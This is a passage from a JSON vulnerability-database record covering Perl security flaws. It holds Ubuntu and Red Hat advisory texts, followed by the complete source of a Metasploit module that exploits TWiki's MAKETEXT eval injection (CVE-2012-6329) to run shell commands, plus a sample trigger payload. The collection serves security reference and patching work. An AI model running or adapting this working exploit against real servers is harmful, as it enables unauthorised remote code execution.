(CVE-2012-5195)\n\nRyo Anazawa discovered that the CGI.pm module does not properly escape newlines in Set-Cookie or P3P (Platform for Privacy Preferences Project) headers. An attacker could use this to inject arbitrary headers into responses from applications that use CGI.pm. (CVE-2012-5526)", "modified": "2012-11-30T00:00:00", "published": "2012-11-30T00:00:00", "id": "USN-1643-1", "href": "https://usn.ubuntu.com/1643-1/", "title": "Perl vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2018-12-11T19:43:05", "bulletinFamily": "unix", "description": "Perl is a high-level programming language commonly used for system\nadministration utilities and web programming.\n\nA heap overflow flaw was found in Perl. If a Perl application allowed\nuser input to control the count argument of the string repeat operator, an\nattacker could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2012-5195)\n\nA denial of service flaw was found in the way Perl's rehashing code\nimplementation, responsible for recalculation of hash keys and\nredistribution of hash content, handled certain input. If an attacker\nsupplied specially-crafted input to be used as hash keys by a Perl\napplication, it could cause excessive memory consumption. (CVE-2013-1667)\n\nIt was found that the Perl CGI module, used to handle Common Gateway\nInterface requests and responses, incorrectly sanitized the values for\nSet-Cookie and P3P headers. If a Perl application using the CGI module\nreused cookies values and accepted untrusted input from web browsers, a\nremote attacker could use this flaw to alter member items of the cookie or\nadd new items. (CVE-2012-5526)\n\nIt was found that the Perl Locale::Maketext module, used to localize Perl\napplications, did not properly handle backslashes or fully-qualified method\nnames. An attacker could possibly use this flaw to execute arbitrary Perl\ncode with the privileges of a Perl application that uses untrusted\nLocale::Maketext templates. (CVE-2012-6329)\n\nRed Hat would like to thank the Perl project for reporting CVE-2012-5195\nand CVE-2013-1667. Upstream acknowledges Tim Brown as the original\nreporter of CVE-2012-5195 and Yves Orton as the original reporter of\nCVE-2013-1667.\n\nAll Perl users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. All running Perl programs\nmust be restarted for this update to take effect.\n", "modified": "2018-06-06T20:24:15", "published": "2013-03-26T04:00:00", "id": "RHSA-2013:0685", "href": "https://access.redhat.com/errata/RHSA-2013:0685", "type": "redhat", "title": "(RHSA-2013:0685) Moderate: perl security update", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-12-11T19:42:14", "bulletinFamily": "unix", "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: A subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA flaw was found in the way KVM handled guest time updates when the buffer\nthe guest registered by writing to the MSR_KVM_SYSTEM_TIME machine state\nregister (MSR) crossed a page boundary. A privileged guest user could use\nthis flaw to crash the host or, potentially, escalate their privileges,\nallowing them to execute arbitrary code at the host kernel level.\n(CVE-2013-1796)\n\nA potential use-after-free flaw was found in the way KVM handled guest time\nupdates when the GPA (guest physical address) the guest registered by\nwriting to the MSR_KVM_SYSTEM_TIME machine state register (MSR) fell into a\nmovable or removable memory region of the hosting user-space process (by\ndefault, QEMU-KVM) on the host. If that memory region is deregistered from\nKVM using KVM_SET_USER_MEMORY_REGION and the allocated virtual memory\nreused, a privileged guest user could potentially use this flaw to escalate\ntheir privileges on the host. (CVE-2013-1797)\n\nA flaw was found in the way KVM emulated IOAPIC (I/O Advanced Programmable\nInterrupt Controller). A missing validation check in the\nioapic_read_indirect() function could allow a privileged guest user to\ncrash the host, or read a substantial portion of host kernel memory.\n(CVE-2013-1798)\n\nAn integer overflow flaw was discovered in one of pixman's manipulation\nroutines. If a remote attacker could trick an application using pixman into\nperforming a certain manipulation, it could cause the application to crash\nor, possibly, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2013-1591)\n\nRed Hat would like to thank Andrew Honig of Google for reporting\nCVE-2013-1796, CVE-2013-1797, and CVE-2013-1798.\n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2013-2266 (a bind issue)\n\nCVE-2012-5195, CVE-2012-5526, CVE-2012-6329, and CVE-2013-1667 (perl\nissues)\n\nThis update contains the fixes from the following errata:\n\novirt-node: RHBA-2013:0745\nlibvirt: RHBA-2013:0725\nvdsm: RHBA-2013:0704\nkernel: RHSA-2013:0744\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which corrects these issues.\n", "modified": "2018-06-07T08:59:42", "published": "2013-04-23T04:00:00", "id": "RHSA-2013:0746", "href": "https://access.redhat.com/errata/RHSA-2013:0746", "type": "redhat", "title": "(RHSA-2013:0746) Important: rhev-hypervisor6 security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:49", "bulletinFamily": "software", "description": "Buffer overflow in decode_xs, Digest constructor buffer veorflow, x operator buffer overflow, CGI.pm headers injection.", "modified": "2012-12-02T00:00:00", "published": "2012-12-02T00:00:00", "id": "SECURITYVULNS:VULN:12731", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12731", "title": "perl multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-1643-1\r\nNovember 30, 2012\r\n\r\nperl vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 12.10\r\n- Ubuntu 12.04 LTS\r\n- Ubuntu 11.10\r\n- Ubuntu 10.04 LTS\r\n- Ubuntu 8.04 LTS\r\n\r\nSummary:\r\n\r\nPerl programs could be made to crash or run programs if they receive\r\nspecially crafted network traffic or other input.\r\n\r\nSoftware Description:\r\n- perl: Larry Wall's Practical Extraction and Report Language\r\n\r\nDetails:\r\n\r\nIt was discovered that the decode_xs function in the Encode module is\r\nvulnerable to a heap-based buffer overflow via a crafted Unicode string.\r\nAn attacker could use this overflow to cause a denial of service.\r\n(CVE-2011-2939)\r\n\r\nIt was discovered that the 'new' constructor in the Digest module is\r\nvulnerable to an eval injection. An attacker could use this to execute\r\narbitrary code. (CVE-2011-3597)\r\n\r\nIt was discovered that Perl's 'x' string repeat operator is vulnerable\r\nto a heap-based buffer overflow. An attacker could use this to execute\r\narbitrary code. (CVE-2012-5195)\r\n\r\nRyo Anazawa discovered that the CGI.pm module does not properly escape\r\nnewlines in Set-Cookie or P3P (Platform for Privacy Preferences Project)\r\nheaders. An attacker could use this to inject arbitrary headers into\r\nresponses from applications that use CGI.pm. (CVE-2012-5526)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 12.10:\r\n perl 5.14.2-13ubuntu0.1\r\n\r\nUbuntu 12.04 LTS:\r\n perl 5.14.2-6ubuntu2.2\r\n\r\nUbuntu 11.10:\r\n perl 5.12.4-4ubuntu0.1\r\n\r\nUbuntu 10.04 LTS:\r\n perl 5.10.1-8ubuntu2.2\r\n\r\nUbuntu 8.04 LTS:\r\n perl 5.8.8-12ubuntu0.7\r\n\r\nPerl programs need to be restarted after a standard system update to\r\nmake all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1643-1\r\n CVE-2011-2939, CVE-2011-3597, CVE-2012-5195, CVE-2012-5526\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/perl/5.14.2-13ubuntu0.1\r\n https://launchpad.net/ubuntu/+source/perl/5.14.2-6ubuntu2.2\r\n https://launchpad.net/ubuntu/+source/perl/5.12.4-4ubuntu0.1\r\n https://launchpad.net/ubuntu/+source/perl/5.10.1-8ubuntu2.2\r\n https://launchpad.net/ubuntu/+source/perl/5.8.8-12ubuntu0.7\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n", "modified": "2012-12-02T00:00:00", "published": "2012-12-02T00:00:00", "id": "SECURITYVULNS:DOC:28787", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28787", "title": "[USN-1643-1] Perl vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2019-05-01T12:31:52", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in the MAKETEXT Twiki variable. By using a specially crafted MAKETEXT, a malicious user can execute shell commands since user input is passed to the Perl \"eval\" command without first being sanitized. The problem is caused by an underlying security issue in the CPAN:Locale::Maketext module. This works in TWiki sites that have user interface localization enabled (UserInterfaceInternationalisation variable set). If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also, if the 'TwikiPage' option isn't provided, the module will try to create a random page on the SandBox space. The module has been tested successfully on TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.", "modified": "2018-08-20T20:43:07", "published": "2012-12-21T10:30:04", "id": "MSF:EXPLOIT/UNIX/WEBAPP/TWIKI_MAKETEXT", "href": "", "type": "metasploit", "title": "TWiki MAKETEXT Remote Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'TWiki MAKETEXT Remote Command Execution',\n 'Description' => %q{\n This module exploits a vulnerability in the MAKETEXT Twiki variable. By using a\n specially crafted MAKETEXT, a malicious user can execute shell commands since user\n input is passed to the Perl \"eval\" command without first being sanitized. The\n problem is caused by an underlying security issue in the CPAN:Locale::Maketext\n module. This works in TWiki sites that have user interface localization enabled\n (UserInterfaceInternationalisation variable set).\n\n If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also,\n if the 'TwikiPage' option isn't provided, the module will try to create a random\n page on the SandBox space. The module has been tested successfully on\n TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine.\n },\n 'Author' =>\n [\n 'George Clark', # original discovery\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2012-6329' ],\n [ 'OSVDB', '88460' ],\n [ 'BID', '56950' ],\n [ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2012-6329' ]\n ],\n 'Privileged' => false, # web server context\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 1024,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic ruby python telnet'\n }\n },\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Targets' => [[ 'Automatic', { }]],\n 'DisclosureDate' => 'Dec 15 2012',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"TWiki base path\", \"/\" ]),\n OptString.new('TwikiPage', [ false, \"TWiki Page with edit permissions to inject the payload, by default random Page on Sandbox (Ex: /Sandbox/MsfTest)\" ]),\n OptString.new('USERNAME', [ false, \"The user to authenticate as (anonymous if username not provided)\"]),\n OptString.new('PASSWORD', [ false, \"The password to authenticate with (anonymous if password not provided)\" ])\n ])\n end\n\n def post_auth?\n true\n end\n\n def do_login(username, password)\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{@base}do/login\",\n 'vars_post' =>\n {\n 'username' => username,\n 'password' => password\n }\n })\n\n if not res or res.code != 302 or res.get_cookies !~ /TWIKISID=([0-9a-f]*)/\n return nil\n end\n\n session = $1\n return session\n end\n\n def inject_code(session, code)\n\n vprint_status(\"Retrieving the crypttoken...\")\n\n res = send_request_cgi({\n 'uri' => \"#{@base}do/edit#{@page}\",\n 'cookie' => \"TWIKISID=#{session}\",\n 'vars_get' =>\n {\n 'nowysiwyg' => '1'\n }\n })\n\n if not res or res.code != 200 or res.body !~ /name=\"crypttoken\" value=\"([0-9a-f]*)\"/\n vprint_error(\"Error retrieving the crypttoken\")\n return nil\n end\n\n crypttoken = $1\n vprint_good(\"crypttoken found: #{crypttoken}\")\n\n if session.empty?\n if res.get_cookies =~ /TWIKISID=([0-9a-f]*)/\n session = $1\n else\n vprint_error(\"Error using anonymous access\")\n return nil\n end\n end\n\n vprint_status(\"Injecting the payload...\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => \"#{@base}do/save#{@page}\",\n 'cookie' => \"TWIKISID=#{session}\",\n 'vars_post' =>\n {\n 'crypttoken' => crypttoken,\n 'text' => \"#{rand_text_alpha(3 + rand(3))} %MAKETEXT{\\\"#{rand_text_alpha(3 + rand(3))} [_1] #{rand_text_alpha(3 + rand(3))}\\\\\\\\'}; `#{code}`; { #\\\" args=\\\"#{rand_text_alpha(3 + rand(3))}\\\"}%\"\n }\n })\n\n if not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/\n print_warning(\"Error injecting the payload\")\n print_status \"#{res.code}\\n#{res.body}\\n#{res.headers['Location']}\"\n return nil\n end\n\n location = URI(res.headers['Location']).path\n print_good(\"Payload injected on #{location}\")\n\n return location\n end\n\n def check\n @base = target_uri.path\n @base << '/' if @base[-1, 1] != '/'\n\n res = send_request_cgi({\n 'uri' => \"#{@base}do/view/TWiki/WebHome\"\n })\n\n if not res or res.code != 200\n return Exploit::CheckCode::Unknown\n end\n\n if res.body =~ /This site is running TWiki version.*TWiki-(\\d\\.\\d\\.\\d)/\n version = $1\n vprint_status(\"Version found: #{version}\")\n if version < \"5.1.3\"\n return Exploit::CheckCode::Appears\n else\n return Exploit::CheckCode::Detected\n end\n end\n\n return Exploit::CheckCode::Safe\n end\n\n\n def exploit\n\n # Init variables\n @page = ''\n\n if datastore['TwikiPage'] and not datastore['TwikiPage'].empty?\n @page << '/' if datastore['TwikiPage'][0] != '/'\n @page << datastore['TwikiPage']\n else\n @page << \"/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}\"\n end\n\n @base = target_uri.path\n @base << '/' if @base[-1, 1] != '/'\n\n # Login if needed\n if (datastore['USERNAME'] and\n not datastore['USERNAME'].empty? and\n datastore['PASSWORD'] and\n not datastore['PASSWORD'].empty?)\n print_status(\"Trying login to get session ID...\")\n session = do_login(datastore['USERNAME'], datastore['PASSWORD'])\n else\n print_status(\"Using anonymous access...\")\n session = \"\"\n end\n\n if not session\n fail_with(Failure::Unknown, \"Error getting a session ID\")\n end\n\n # Inject payload\n print_status(\"Trying to inject the payload on #{@page}...\")\n res = inject_code(session, payload.encoded)\n if not res\n fail_with(Failure::Unknown, \"Error injecting the payload\")\n end\n\n # Execute payload\n print_status(\"Executing the payload through #{res}...\")\n res = send_request_cgi({\n 'uri' => res,\n 'cookie' => \"TWIKISID=#{session}\"\n })\n if not res or res.code != 200 or res.body !~ /HASH/\n fail_with(Failure::Unknown, \"Error executing the payload\")\n end\n\n print_good(\"Exploitation was successful\")\n\n end\nend\n\n=begin\n\n* Trigger:\n\n%MAKETEXT{\"test [_1] secondtest\\\\'}; `touch /tmp/msf.txt`; { #\" args=\"msf\"}%\n\n=end\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/twiki_maketext.rb"}]}
